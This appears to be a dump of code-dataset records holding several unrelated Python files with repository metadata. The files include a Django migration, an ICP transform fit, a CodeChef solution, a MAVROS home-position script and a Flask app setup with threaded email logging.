"""Environment Variables """ import os from dotenv import load_dotenv load_dotenv() HIC_DB_USERNAME = os.environ["HIC_DB_USERNAME"] HIC_DB_PASSWORD = os.environ["HIC_DB_PASSWORD"] HIC_DB_HOST = os.environ["HIC_DB_HOST"] HIC_DB_DATABASE = os.environ["HIC_DB_DATABASE"] MS_SQL_ODBC_DRIVER = os.environ["MS_SQL_ODBC_DRIVER"] MS_SQL_UHL_DWH_HOST = os.environ["MS_SQL_UHL_DWH_HOST"] MS_SQL_UHL_DWH_USER = os.environ["MS_SQL_UHL_DWH_USER"] MS_SQL_UHL_DWH_PASSWORD = os.environ["MS_SQL_UHL_DWH_PASSWORD"] IDENTITY_API_KEY = os.environ["IDENTITY_API_KEY"] IDENTITY_HOST = os.environ["IDENTITY_HOST"] HIC_CONNECTION_STRING = os.environ["HIC_CONNECTION_STRING"] HIC_HOST = os.environ["HIC_HOST"] HIC_USERNAME = os.environ["HIC_USERNAME"] HIC_PASSWORD = os.environ["HIC_PASSWORD"]
30.807692
64
0.781523
"""Environment Variables """ import os from dotenv import load_dotenv load_dotenv() HIC_DB_USERNAME = os.environ["HIC_DB_USERNAME"] HIC_DB_PASSWORD = os.environ["HIC_DB_PASSWORD"] HIC_DB_HOST = os.environ["HIC_DB_HOST"] HIC_DB_DATABASE = os.environ["HIC_DB_DATABASE"] MS_SQL_ODBC_DRIVER = os.environ["MS_SQL_ODBC_DRIVER"] MS_SQL_UHL_DWH_HOST = os.environ["MS_SQL_UHL_DWH_HOST"] MS_SQL_UHL_DWH_USER = os.environ["MS_SQL_UHL_DWH_USER"] MS_SQL_UHL_DWH_PASSWORD = os.environ["MS_SQL_UHL_DWH_PASSWORD"] IDENTITY_API_KEY = os.environ["IDENTITY_API_KEY"] IDENTITY_HOST = os.environ["IDENTITY_HOST"] HIC_CONNECTION_STRING = os.environ["HIC_CONNECTION_STRING"] HIC_HOST = os.environ["HIC_HOST"] HIC_USERNAME = os.environ["HIC_USERNAME"] HIC_PASSWORD = os.environ["HIC_PASSWORD"]
0
0
0
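environment.py above fails fast: every setting is read with os.environ[...] so a missing variable raises KeyError at import time. Below is a hypothetical consumer of those settings, not part of the repository, showing how the UHL DWH variables might be assembled into a raw ODBC connection string.

# Hypothetical usage sketch; `import environment` assumes the module above is on the path
# and that all required variables are set (otherwise the import itself raises KeyError).
import environment

def uhl_dwh_odbc_string() -> str:
    # Plain string assembly only; no database driver is imported here.
    return "DRIVER={{{driver}}};SERVER={host};UID={user};PWD={password}".format(
        driver=environment.MS_SQL_ODBC_DRIVER,
        host=environment.MS_SQL_UHL_DWH_HOST,
        user=environment.MS_SQL_UHL_DWH_USER,
        password=environment.MS_SQL_UHL_DWH_PASSWORD,
    )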
f0682b750b96bf2f312eb6ff9f2bea5aef2c5958
390
py
Python
nbd_app/migrations/0007_alter_socialamenities_hotline_number.py
Kevson102/Nbd-Phoenix
509a9cf026d24827dccc9a5ec67819ecd86fbf03
[ "MIT" ]
null
null
null
nbd_app/migrations/0007_alter_socialamenities_hotline_number.py
Kevson102/Nbd-Phoenix
509a9cf026d24827dccc9a5ec67819ecd86fbf03
[ "MIT" ]
null
null
null
nbd_app/migrations/0007_alter_socialamenities_hotline_number.py
Kevson102/Nbd-Phoenix
509a9cf026d24827dccc9a5ec67819ecd86fbf03
[ "MIT" ]
null
null
null
# Generated by Django 3.2.9 on 2022-01-03 14:32 from django.db import migrations, models
20.526316
47
0.605128
# Generated by Django 3.2.9 on 2022-01-03 14:32 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('nbd_app', '0006_generalposts'), ] operations = [ migrations.AlterField( model_name='socialamenities', name='hotline_number', field=models.BigIntegerField(), ), ]
0
276
23
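The migration above only alters one column, so the model state it implies can be sketched but not fully reconstructed. Below is a minimal, assumed excerpt of nbd_app/models.py after migration 0007; the class name capitalization and the absence of other fields are guesses, not the repository's actual code.

# Hypothetical model excerpt consistent with the AlterField operation above.
from django.db import models

class SocialAmenities(models.Model):
    # BigIntegerField holds phone-style numbers that can overflow a 32-bit IntegerField.
    hotline_number = models.BigIntegerField()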
a68bccebe211588992d72d7335645e18121c4bf1
1,039
py
Python
python/icp.py
nowtechnologies/ridi_imu
2d8a8e54d0491c44de7edac662b101db47ad3cfc
[ "MIT" ]
140
2018-05-27T16:11:40.000Z
2022-03-28T15:49:28.000Z
python/icp.py
nowtechnologies/ridi_imu
2d8a8e54d0491c44de7edac662b101db47ad3cfc
[ "MIT" ]
13
2018-07-16T20:59:58.000Z
2021-12-09T08:35:43.000Z
python/icp.py
nowtechnologies/ridi_imu
2d8a8e54d0491c44de7edac662b101db47ad3cfc
[ "MIT" ]
58
2018-02-14T03:53:51.000Z
2022-03-07T15:59:41.000Z
import numpy as np def fit_transformation(source, target): """ This function computes the best rigid transformation between two point sets. It assumes that "source" and "target" are with the same length and "source[i]" corresponds to "target[i]". :param source: Nxd array. :param target: Nxd array. :return: A transformation as (d+1)x(d+1) matrix; the rotation part as a dxd matrix and the translation part as a dx1 vector. """ assert source.shape == target.shape center_source = np.mean(source, axis=0) center_target = np.mean(target, axis=0) m = source.shape[1] source_zeromean = source - center_source target_zeromean = target - center_target W = np.dot(source_zeromean.T, target_zeromean) U, S, Vt = np.linalg.svd(W) R = np.dot(Vt.T, U.T) if np.linalg.det(R) < 0: Vt[m - 1, :] *= -1 R = np.dot(Vt.T, U.T) t = center_target.T - np.dot(R, center_source.T) T = np.identity(m + 1) T[:m, :m] = R T[:m, m] = t return T, R, t
33.516129
109
0.627526
import numpy as np def fit_transformation(source, target): """ This function computes the best rigid transformation between two point sets. It assumes that "source" and "target" are with the same length and "source[i]" corresponds to "target[i]". :param source: Nxd array. :param target: Nxd array. :return: A transformation as (d+1)x(d+1) matrix; the rotation part as a dxd matrix and the translation part as a dx1 vector. """ assert source.shape == target.shape center_source = np.mean(source, axis=0) center_target = np.mean(target, axis=0) m = source.shape[1] source_zeromean = source - center_source target_zeromean = target - center_target W = np.dot(source_zeromean.T, target_zeromean) U, S, Vt = np.linalg.svd(W) R = np.dot(Vt.T, U.T) if np.linalg.det(R) < 0: Vt[m - 1, :] *= -1 R = np.dot(Vt.T, U.T) t = center_target.T - np.dot(R, center_source.T) T = np.identity(m + 1) T[:m, :m] = R T[:m, m] = t return T, R, t
0
0
0
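fit_transformation above is essentially the classic SVD-based (Kabsch-style) fit of a rigid transform between corresponding point sets. A short self-check sketch, assuming python/icp.py is importable as `icp`: apply a known rotation and translation to random points and confirm they are recovered.

# Self-check sketch for fit_transformation (assumes `from icp import fit_transformation` works).
import numpy as np
from icp import fit_transformation

rng = np.random.default_rng(0)
source = rng.normal(size=(100, 3))

# Known rigid transform: rotation about z by 30 degrees plus a translation.
theta = np.deg2rad(30.0)
R_true = np.array([[np.cos(theta), -np.sin(theta), 0.0],
                   [np.sin(theta),  np.cos(theta), 0.0],
                   [0.0,            0.0,           1.0]])
t_true = np.array([1.0, -2.0, 0.5])
target = source @ R_true.T + t_true

T, R, t = fit_transformation(source, target)
assert np.allclose(R, R_true, atol=1e-8)
assert np.allclose(t, t_true, atol=1e-8)
assert np.allclose(target, source @ R.T + t, atol=1e-8)   # T stacks R and t in homogeneous form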
d22e0e78871a5ab8c68a346843dd049461897cb0
1,887
py
Python
codechef/long-challenge/may21/MODEQ.py
ramanaditya/data-structure-and-algorithms
8dcfeb011e76b2b38b54842e8ccc7a59728141f8
[ "MIT" ]
81
2020-05-22T14:22:04.000Z
2021-12-18T10:11:23.000Z
codechef/long-challenge/may21/MODEQ.py
techhub-community/data-structure-and-algorithms
8dcfeb011e76b2b38b54842e8ccc7a59728141f8
[ "MIT" ]
4
2020-08-06T21:08:00.000Z
2021-03-31T16:07:50.000Z
codechef/long-challenge/may21/MODEQ.py
techhub-community/data-structure-and-algorithms
8dcfeb011e76b2b38b54842e8ccc7a59728141f8
[ "MIT" ]
37
2020-05-22T14:25:21.000Z
2021-12-30T03:13:13.000Z
""" [Modular Equation](https://www.codechef.com/MAY21C/problems/MODEQ) Given integers N and M, find the number of ordered pairs (a,b) such that 1≤a<b≤N and ((M mod a) mod b)=((M mod b) mod a). Input The first line contains an integer T, the number of test cases. Then the test cases follow. The only line of each test case contains two integers N, M. Output For each testcase, output in a single line the answer to the problem. Constraints 1≤T≤1000 2≤N≤106 1≤M≤5⋅105 The sum of N over all test cases does not exceed 106. Note: Multiplier for JAVA for this problem is reduced to 1.25 instead of usual 2. Subtasks Subtask #1 (10 points): 1≤T≤10 2≤N≤103 1≤M≤105 Subtask #2 (40 points): 1≤T≤100 2≤N≤105 1≤M≤105 The sum of N over all test cases does not exceed 106. Subtask #3 (50 points): Original Constraints Sample Input 3 3 5 3 6 3 10 Sample Output 2 3 2 Explanation Test Case 1: The valid pairs are {(1,2),(1,3)}. Test Case 2: The valid pairs are {(1,2),(1,3),(2,3)}. Test Case 3: The valid pairs are {(1,2),(1,3)}. """ import sys # Brute Force """ if __name__ == '__main__': input = sys.stdin.read() data = list(map(int, input.split())) T = data[0] idx = 1 while T > 0: N, M = data[idx: idx + 2] res = 0 for i in range(1, N): for j in range(i + 1, N + 1): if (M % i) % j == (M % j) % i: res += 1 print(res) T -= 1 idx += 2 # Time : 0.58s """ if __name__ == '__main__': T = int(input()) idx = 1 while T > 0: N, M = list(map(int, input().split())) res = 0 mod = dict() for a in range(2, N+1): mod_with_a = M % a res += mod.get(mod_with_a, 1) for b in range(mod_with_a, N+1, a): mod[b] = mod.get(b, 1) + 1 print(res) T -= 1 # Time : 4.92s
19.255102
91
0.569687
""" [Modular Equation](https://www.codechef.com/MAY21C/problems/MODEQ) Given integers N and M, find the number of ordered pairs (a,b) such that 1≤a<b≤N and ((M mod a) mod b)=((M mod b) mod a). Input The first line contains an integer T, the number of test cases. Then the test cases follow. The only line of each test case contains two integers N, M. Output For each testcase, output in a single line the answer to the problem. Constraints 1≤T≤1000 2≤N≤106 1≤M≤5⋅105 The sum of N over all test cases does not exceed 106. Note: Multiplier for JAVA for this problem is reduced to 1.25 instead of usual 2. Subtasks Subtask #1 (10 points): 1≤T≤10 2≤N≤103 1≤M≤105 Subtask #2 (40 points): 1≤T≤100 2≤N≤105 1≤M≤105 The sum of N over all test cases does not exceed 106. Subtask #3 (50 points): Original Constraints Sample Input 3 3 5 3 6 3 10 Sample Output 2 3 2 Explanation Test Case 1: The valid pairs are {(1,2),(1,3)}. Test Case 2: The valid pairs are {(1,2),(1,3),(2,3)}. Test Case 3: The valid pairs are {(1,2),(1,3)}. """ import sys # Brute Force """ if __name__ == '__main__': input = sys.stdin.read() data = list(map(int, input.split())) T = data[0] idx = 1 while T > 0: N, M = data[idx: idx + 2] res = 0 for i in range(1, N): for j in range(i + 1, N + 1): if (M % i) % j == (M % j) % i: res += 1 print(res) T -= 1 idx += 2 # Time : 0.58s """ if __name__ == '__main__': T = int(input()) idx = 1 while T > 0: N, M = list(map(int, input().split())) res = 0 mod = dict() for a in range(2, N+1): mod_with_a = M % a res += mod.get(mod_with_a, 1) for b in range(mod_with_a, N+1, a): mod[b] = mod.get(b, 1) + 1 print(res) T -= 1 # Time : 4.92s
0
0
0
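For the MODEQ record above: because a < b forces (M % a) % b == M % a, the pair condition reduces to M % a == (M % b) % a. The accepted loop processes values in increasing order; each value a marks every larger index b with b % a == M % a, and each later value looks up the count stored at its own M % b (the default of 1 covers the always-valid pair with 1). Below is a cross-check sketch comparing that counting with a direct O(N^2) count on small inputs; it is an illustration, not part of the submission.

# Cross-check sketch: the dictionary-based counting from the record vs. a direct O(N^2) count.
import random

def count_pairs_fast(N, M):
    res = 0
    mod = {}
    for a in range(2, N + 1):
        r = M % a
        res += mod.get(r, 1)          # default 1 covers the always-valid pair (1, a)
        for b in range(r, N + 1, a):  # mark every b with b % a == M % a for later values
            mod[b] = mod.get(b, 1) + 1
    return res

def count_pairs_brute(N, M):
    return sum(
        (M % a) % b == (M % b) % a
        for a in range(1, N + 1)
        for b in range(a + 1, N + 1)
    )

for _ in range(200):
    N, M = random.randint(2, 60), random.randint(1, 500)
    assert count_pairs_fast(N, M) == count_pairs_brute(N, M), (N, M)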
836b1d1ef0eb551fa9e79cfab6310f6344d73c36
1,870
py
Python
invana_bot/manifests/single.py
subhead/invana-bot
c60883986acd1baf279ccbe74dfe06435680fba9
[ "MIT" ]
23
2019-01-31T08:04:39.000Z
2021-12-20T15:55:27.000Z
invana_bot/manifests/single.py
subhead/invana-bot
c60883986acd1baf279ccbe74dfe06435680fba9
[ "MIT" ]
12
2019-02-13T04:59:38.000Z
2021-12-13T20:43:07.000Z
invana_bot/manifests/single.py
subhead/invana-bot
c60883986acd1baf279ccbe74dfe06435680fba9
[ "MIT" ]
4
2019-02-10T18:27:33.000Z
2019-07-12T17:52:36.000Z
import sys import os import yaml class SingleCrawlerManifestManager(object): """ """ required_files = ["spider_manifest.json", "spider_manifest.py"]
35.283019
109
0.661497
import sys import os import yaml class SingleCrawlerManifestManager(object): """ """ required_files = ["spider_manifest.json", "spider_manifest.py"] def __init__(self, config_path=None): print("Setting ETI path as: {}".format(config_path)) self.config_path = config_path def import_files(self): # print("self.manifest_path", self.config_path) self.spider_config = yaml.load(open("{}/spider_manifest.yml".format(self.config_path))) sys.path.append(self.config_path) import spider_transformations self.cti_transformations_module = spider_transformations # print("cti_manifest is {}".format(self.spider_config)) # print("cti_transformations_module is {}".format(self.cti_transformations_module)) def validate_cti_path_and_files(self): errors = [] try: files_in_path = os.listdir(self.config_path) except Exception as e: errors.append("No such path exist {}".format(self.config_path)) files_in_path = [] if errors == 0: for required_file in self.required_files: if required_file not in files_in_path: errors.append("{} file not in the path {}".format(required_file, self.config_path)) return errors def import_cti_transformations(self): for tranformation in self.spider_config.get("transformations", []): method_to_call = getattr(self.cti_transformations_module, tranformation.get("transformation_fn")) tranformation['transformation_fn'] = method_to_call def get_manifest(self): errors = self.validate_cti_path_and_files() if len(errors) > 0: return None, errors self.import_files() self.import_cti_transformations() return self.spider_config, errors
1,569
0
135
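SingleCrawlerManifestManager above validates a config directory, loads spider_manifest.yml, imports a spider_transformations module from the same path, and swaps each transformation_fn name for the actual function. A usage sketch follows; the import path mirrors the record's file location and the config path is a placeholder.

# Usage sketch (assumes invana_bot is installed as a package; the path is a placeholder).
from invana_bot.manifests.single import SingleCrawlerManifestManager

manager = SingleCrawlerManifestManager(config_path="/path/to/crawler/config")
spider_config, errors = manager.get_manifest()
if errors:
    print("manifest errors:", errors)      # missing files or a bad path were reported
else:
    for transformation in spider_config.get("transformations", []):
        print(transformation["transformation_fn"])  # now a callable, not a string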
ba156beb04b99754b5ff29ec37e1bcc01509b22c
2,838
py
Python
swam/src/mavros_set_home.py
donghee/swam-indoor-flight
bad8adce428e0adacb0f4110ca5739f31a9a11f8
[ "Apache-2.0" ]
null
null
null
swam/src/mavros_set_home.py
donghee/swam-indoor-flight
bad8adce428e0adacb0f4110ca5739f31a9a11f8
[ "Apache-2.0" ]
null
null
null
swam/src/mavros_set_home.py
donghee/swam-indoor-flight
bad8adce428e0adacb0f4110ca5739f31a9a11f8
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python ## # # Send SET_GPS_GLOBAL_ORIGIN and SET_HOME_POSITION messages # ## import rospy from pymavlink.dialects.v10 import ardupilotmega as MAV_APM from mavros.mavlink import convert_to_rosmsg from mavros_msgs.msg import Mavlink class fifo(object): """ A simple buffer """ def send_message(msg, mav, pub): """ Send a mavlink message """ msg.pack(mav) rosmsg = convert_to_rosmsg(msg) pub.publish(rosmsg) print("sent message %s" % msg) def set_global_origin(mav, pub, lat, lon, alt): """ Send a mavlink SET_GPS_GLOBAL_ORIGIN message, which allows us to use local position information without a GPS. """ #target_system = mav.srcSystem target_system = 0 # 0 --> broadcast to everyone lattitude = lat longitude = lon altitude = alt msg = MAV_APM.MAVLink_set_gps_global_origin_message( target_system, lattitude, longitude, altitude) send_message(msg, mav, pub) def set_home_position(mav, pub, lat, lon, alt, _x, _y, _z): """ Send a mavlink SET_HOME_POSITION message, which should allow us to use local position information without a GPS """ target_system = 0 # broadcast to everyone lattitude = lat longitude = lon altitude = alt x = _x y = _y z = _z q = [1, 0, 0, 0] # w x y z approach_x = 0 approach_y = 0 approach_z = 1 msg = MAV_APM.MAVLink_set_home_position_message( target_system, lattitude, longitude, altitude, x, y, z, q, approach_x, approach_y, approach_z) send_message(msg, mav, pub) if __name__=="__main__": rospy.init_node('set_home', anonymous=True) # Global position of the origin lat = 37.4933566 * 1e7 lon = 126.8339491 * 1e7 alt = 200 * 1e3 # x = 3.678 # y = -1.719 # z = 0 x = 0 y = 0 z = 0 set_home(lat, lon, alt, x, y, z)
22.704
76
0.582805
#!/usr/bin/env python ## # # Send SET_GPS_GLOBAL_ORIGIN and SET_HOME_POSITION messages # ## import rospy from pymavlink.dialects.v10 import ardupilotmega as MAV_APM from mavros.mavlink import convert_to_rosmsg from mavros_msgs.msg import Mavlink class fifo(object): """ A simple buffer """ def __init__(self): self.buf = [] def write(self, data): self.buf += data return len(data) def read(self): return self.buf.pop(0) def send_message(msg, mav, pub): """ Send a mavlink message """ msg.pack(mav) rosmsg = convert_to_rosmsg(msg) pub.publish(rosmsg) print("sent message %s" % msg) def set_global_origin(mav, pub, lat, lon, alt): """ Send a mavlink SET_GPS_GLOBAL_ORIGIN message, which allows us to use local position information without a GPS. """ #target_system = mav.srcSystem target_system = 0 # 0 --> broadcast to everyone lattitude = lat longitude = lon altitude = alt msg = MAV_APM.MAVLink_set_gps_global_origin_message( target_system, lattitude, longitude, altitude) send_message(msg, mav, pub) def set_home_position(mav, pub, lat, lon, alt, _x, _y, _z): """ Send a mavlink SET_HOME_POSITION message, which should allow us to use local position information without a GPS """ target_system = 0 # broadcast to everyone lattitude = lat longitude = lon altitude = alt x = _x y = _y z = _z q = [1, 0, 0, 0] # w x y z approach_x = 0 approach_y = 0 approach_z = 1 msg = MAV_APM.MAVLink_set_home_position_message( target_system, lattitude, longitude, altitude, x, y, z, q, approach_x, approach_y, approach_z) send_message(msg, mav, pub) def set_home(lat, lon, alt, x, y, z): try: mavlink_pub = rospy.Publisher("/mavlink/to", Mavlink, queue_size=20) # Set up mavlink instance f = fifo() mav = MAV_APM.MAVLink(f, srcSystem=1, srcComponent=1) # wait to initialize while mavlink_pub.get_num_connections() <= 0: pass for _ in range(5): rospy.sleep(1) set_global_origin(mav, mavlink_pub, lat, lon, alt) set_home_position(mav, mavlink_pub, lat, lon, alt, x, y, z) except rospy.ROSInterruptException: pass if __name__=="__main__": rospy.init_node('set_home', anonymous=True) # Global position of the origin lat = 37.4933566 * 1e7 lon = 126.8339491 * 1e7 alt = 200 * 1e3 # x = 3.678 # y = -1.719 # z = 0 x = 0 y = 0 z = 0 set_home(lat, lon, alt, x, y, z)
674
0
101
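The script above scales latitude/longitude by 1e7 and altitude by 1e3 before building the messages, which lines up with the integer degE7 and millimetre units the SET_GPS_GLOBAL_ORIGIN and SET_HOME_POSITION fields expect. A tiny conversion helper sketch; the original simply inlines the multiplications.

# Conversion sketch: decimal degrees and metres to the integer units used above.
def to_mavlink_origin(lat_deg: float, lon_deg: float, alt_m: float):
    """Return (lat, lon, alt) as degE7, degE7 and millimetres."""
    return int(round(lat_deg * 1e7)), int(round(lon_deg * 1e7)), int(round(alt_m * 1e3))

lat, lon, alt = to_mavlink_origin(37.4933566, 126.8339491, 200.0)
# (374933566, 1268339491, 200000): the same values the __main__ block computes inline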
c71a1bff4f3192e1d1ec8a670f9e040c334dc954
3,344
py
Python
tests/clims/api/serializers/models/test_process_definition.py
commonlims/commonlims
36a02ed244c7b59ee1f2523e64e4749e404ab0f7
[ "BSD-3-Clause" ]
4
2019-05-27T13:55:07.000Z
2021-03-30T07:05:09.000Z
tests/clims/api/serializers/models/test_process_definition.py
commonlims/commonlims
36a02ed244c7b59ee1f2523e64e4749e404ab0f7
[ "BSD-3-Clause" ]
99
2019-05-20T14:16:33.000Z
2021-01-19T09:25:15.000Z
tests/clims/api/serializers/models/test_process_definition.py
commonlims/commonlims
36a02ed244c7b59ee1f2523e64e4749e404ab0f7
[ "BSD-3-Clause" ]
1
2020-08-10T07:55:40.000Z
2020-08-10T07:55:40.000Z
from __future__ import absolute_import from tests.clims.models.test_substance import SubstanceTestCase from clims.plugins.demo.dnaseq.workflows.sequence import SequenceSimple from clims.api.serializers.models.process_definition import ProcessDefinitionSerializer expected_sequence_simple = { 'id': u'clims.plugins.demo.dnaseq.workflows.sequence.SequenceSimple', 'fields': [{ 'label': u'Comment', 'help': None, 'required': False, 'choices': [], 'type': u'textarea', 'name': u'comment' }, { 'label': u'Sample prep', 'help': u'The method used for preparing the sample', 'required': True, 'choices': ['microwave', 'mixer'], 'type': u'select', 'name': u'sample_prep' }, { 'label': u'Sequencer', 'help': u'Instrument where the sample will be sequenced', 'required': True, 'choices': ['iPhone', 'Android', 'Bang & Olufsen'], 'type': u'select', 'name': u'sequencer' }, { 'label': u'Sample type', 'help': u'The type of the sample', 'required': True, 'choices': ['DNA', 'RNA'], 'type': u'select', 'name': u'sample_type' }], 'presets': [{ 'variables': { 'sample_prep': 'microwave', 'sequencer': 'Android', 'sample_type': 'DNA' }, 'processDefinitionId': 'clims.plugins.demo.dnaseq.workflows.sequence.SequenceSimple', 'name': 'Android: DNA prepared with microwave' }, { 'variables': { 'sample_prep': 'mixer', 'sequencer': 'Android', 'sample_type': 'DNA' }, 'processDefinitionId': 'clims.plugins.demo.dnaseq.workflows.sequence.SequenceSimple', 'name': 'Android: DNA prepared with mixer' }, { 'variables': { 'sample_prep': 'microwave', 'sample_type': 'DNA', 'sequencer': 'iPhone' }, 'processDefinitionId': 'clims.plugins.demo.dnaseq.workflows.sequence.SequenceSimple', 'name': 'iPhone: DNA prepared with microwave' }, { 'variables': { 'sample_prep': 'microwave', 'sequencer': 'Android', 'sample_type': 'RNA' }, 'processDefinitionId': 'clims.plugins.demo.dnaseq.workflows.sequence.SequenceSimple', 'name': 'Android: RNA prepared with microwave' }, { 'variables': { 'sample_prep': 'microwave', 'sample_type': 'DNA', 'sequencer': 'Bang & Olufsen' }, 'processDefinitionId': 'clims.plugins.demo.dnaseq.workflows.sequence.SequenceSimple', 'name': 'Bang & Olufsen: DNA prepared with microwave' }, { 'variables': { 'sample_prep': 'mixer', 'sequencer': 'Android', 'sample_type': 'RNA' }, 'processDefinitionId': 'clims.plugins.demo.dnaseq.workflows.sequence.SequenceSimple', 'name': 'Android: RNA prepared with mixer' }] }
32.466019
87
0.566089
from __future__ import absolute_import from tests.clims.models.test_substance import SubstanceTestCase from clims.plugins.demo.dnaseq.workflows.sequence import SequenceSimple from clims.api.serializers.models.process_definition import ProcessDefinitionSerializer class ProcessDefinitionSerializerTest(SubstanceTestCase): def test_simple(self): process = SequenceSimple() serializer = ProcessDefinitionSerializer(process) assert serializer.data == expected_sequence_simple expected_sequence_simple = { 'id': u'clims.plugins.demo.dnaseq.workflows.sequence.SequenceSimple', 'fields': [{ 'label': u'Comment', 'help': None, 'required': False, 'choices': [], 'type': u'textarea', 'name': u'comment' }, { 'label': u'Sample prep', 'help': u'The method used for preparing the sample', 'required': True, 'choices': ['microwave', 'mixer'], 'type': u'select', 'name': u'sample_prep' }, { 'label': u'Sequencer', 'help': u'Instrument where the sample will be sequenced', 'required': True, 'choices': ['iPhone', 'Android', 'Bang & Olufsen'], 'type': u'select', 'name': u'sequencer' }, { 'label': u'Sample type', 'help': u'The type of the sample', 'required': True, 'choices': ['DNA', 'RNA'], 'type': u'select', 'name': u'sample_type' }], 'presets': [{ 'variables': { 'sample_prep': 'microwave', 'sequencer': 'Android', 'sample_type': 'DNA' }, 'processDefinitionId': 'clims.plugins.demo.dnaseq.workflows.sequence.SequenceSimple', 'name': 'Android: DNA prepared with microwave' }, { 'variables': { 'sample_prep': 'mixer', 'sequencer': 'Android', 'sample_type': 'DNA' }, 'processDefinitionId': 'clims.plugins.demo.dnaseq.workflows.sequence.SequenceSimple', 'name': 'Android: DNA prepared with mixer' }, { 'variables': { 'sample_prep': 'microwave', 'sample_type': 'DNA', 'sequencer': 'iPhone' }, 'processDefinitionId': 'clims.plugins.demo.dnaseq.workflows.sequence.SequenceSimple', 'name': 'iPhone: DNA prepared with microwave' }, { 'variables': { 'sample_prep': 'microwave', 'sequencer': 'Android', 'sample_type': 'RNA' }, 'processDefinitionId': 'clims.plugins.demo.dnaseq.workflows.sequence.SequenceSimple', 'name': 'Android: RNA prepared with microwave' }, { 'variables': { 'sample_prep': 'microwave', 'sample_type': 'DNA', 'sequencer': 'Bang & Olufsen' }, 'processDefinitionId': 'clims.plugins.demo.dnaseq.workflows.sequence.SequenceSimple', 'name': 'Bang & Olufsen: DNA prepared with microwave' }, { 'variables': { 'sample_prep': 'mixer', 'sequencer': 'Android', 'sample_type': 'RNA' }, 'processDefinitionId': 'clims.plugins.demo.dnaseq.workflows.sequence.SequenceSimple', 'name': 'Android: RNA prepared with mixer' }] }
153
36
49
6ce3cc168aa038a313b9bba66d4ce994e8318fc9
2,306
py
Python
app/__init__.py
x14119641/tracker
bd16897848c23c461d5d4b7a353eedd8f17367a6
[ "MIT" ]
null
null
null
app/__init__.py
x14119641/tracker
bd16897848c23c461d5d4b7a353eedd8f17367a6
[ "MIT" ]
null
null
null
app/__init__.py
x14119641/tracker
bd16897848c23c461d5d4b7a353eedd8f17367a6
[ "MIT" ]
null
null
null
from flask import Flask from config import Config from flask_sqlalchemy import SQLAlchemy from flask_migrate import Migrate from flask_login import LoginManager from logging.handlers import SMTPHandler,RotatingFileHandler from flask_mail import Mail, Message import logging,os, smtplib from threading import Thread app = Flask(__name__) app.config.from_object(Config) db = SQLAlchemy(app) migrate = Migrate(app, db) mail = Mail(app) login = LoginManager(app) login.login_view = 'login' from app import routes, models, errors class ThreadedSMTPHandler(SMTPHandler): """ Mimic SMTPHandler from logging module but seperate the actual emission (.emit) in another thread to avoid blocking the main process """ if not app.debug: if app.config['MAIL_SERVER']: auth = None if app.config['MAIL_USERNAME'] or app.config['MAIL_PASSWORD']: auth = (app.config['MAIL_USERNAME'], app.config['MAIL_PASSWORD']) secure = None if app.config['MAIL_USE_TLS']: secure = () mail_handler = ThreadedSMTPHandler( mailhost=(app.config['MAIL_SERVER'], app.config['MAIL_PORT']), # fromaddr='no-reply@' + app.config['MAIL_SERVER'], fromaddr=app.config['MAIL_USERNAME'], toaddrs=app.config['ADMINS'], subject='Tracker Failure', credentials=auth, secure=() ) mail_handler.setLevel(logging.ERROR) app.logger.addHandler(mail_handler) if not os.path.exists('logs'): os.mkdir('logs') file_handler = RotatingFileHandler('logs/tracker.log', maxBytes=10240, backupCount=10) file_handler.setFormatter(logging.Formatter( '%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')) file_handler.setLevel(logging.INFO) app.logger.addHandler(file_handler) app.logger.setLevel(logging.INFO) app.logger.info(f'{app.__repr__} - startup')
36.603175
183
0.666522
from flask import Flask from config import Config from flask_sqlalchemy import SQLAlchemy from flask_migrate import Migrate from flask_login import LoginManager from logging.handlers import SMTPHandler,RotatingFileHandler from flask_mail import Mail, Message import logging,os, smtplib from threading import Thread app = Flask(__name__) app.config.from_object(Config) db = SQLAlchemy(app) migrate = Migrate(app, db) mail = Mail(app) login = LoginManager(app) login.login_view = 'login' from app import routes, models, errors class ThreadedSMTPHandler(SMTPHandler): """ Mimic SMTPHandler from logging module but seperate the actual emission (.emit) in another thread to avoid blocking the main process """ def emit(self, record): #I am not sure of the best way to write the following line thread = Thread(target=super().emit, args=(record,)) #for Python2 : either modify super either : thread = Thread(target=logging.handlers.SMTPHandler.emit, args=(self, record)) thread.start() if not app.debug: if app.config['MAIL_SERVER']: auth = None if app.config['MAIL_USERNAME'] or app.config['MAIL_PASSWORD']: auth = (app.config['MAIL_USERNAME'], app.config['MAIL_PASSWORD']) secure = None if app.config['MAIL_USE_TLS']: secure = () mail_handler = ThreadedSMTPHandler( mailhost=(app.config['MAIL_SERVER'], app.config['MAIL_PORT']), # fromaddr='no-reply@' + app.config['MAIL_SERVER'], fromaddr=app.config['MAIL_USERNAME'], toaddrs=app.config['ADMINS'], subject='Tracker Failure', credentials=auth, secure=() ) mail_handler.setLevel(logging.ERROR) app.logger.addHandler(mail_handler) if not os.path.exists('logs'): os.mkdir('logs') file_handler = RotatingFileHandler('logs/tracker.log', maxBytes=10240, backupCount=10) file_handler.setFormatter(logging.Formatter( '%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')) file_handler.setLevel(logging.INFO) app.logger.addHandler(file_handler) app.logger.setLevel(logging.INFO) app.logger.info(f'{app.__repr__} - startup')
276
0
26
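ThreadedSMTPHandler above keeps the standard SMTPHandler behaviour but runs the actual emission in a separate thread, so a slow or unreachable mail server never blocks the request that triggered the log record. Below is a minimal standalone sketch of the same pattern using only the standard library; the Flask/Config wiring from the record is omitted and the addresses are placeholders.

# Standalone sketch of the threaded-emit handler pattern (addresses are placeholders).
import logging
import logging.handlers
from threading import Thread

class ThreadedSMTPHandler(logging.handlers.SMTPHandler):
    """SMTPHandler whose emit() runs in a daemon thread so logging never blocks."""
    def emit(self, record):
        Thread(target=super().emit, args=(record,), daemon=True).start()

handler = ThreadedSMTPHandler(
    mailhost=("smtp.example.com", 587),
    fromaddr="no-reply@example.com",
    toaddrs=["admin@example.com"],
    subject="App failure",
    credentials=("user", "password"),
    secure=(),
)
handler.setLevel(logging.ERROR)
logging.getLogger("app").addHandler(handler)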
10521b97d7d1e032daf03879ad3e7c6638f79485
1,526
py
Python
Python Fundamentals/Regular Expressions/More Exercises/Task02_3.py
DonikaChervenkova/SoftUni
bff579c037ec48f39ed193b34bc3502a32e90732
[ "MIT" ]
1
2022-03-16T10:23:04.000Z
2022-03-16T10:23:04.000Z
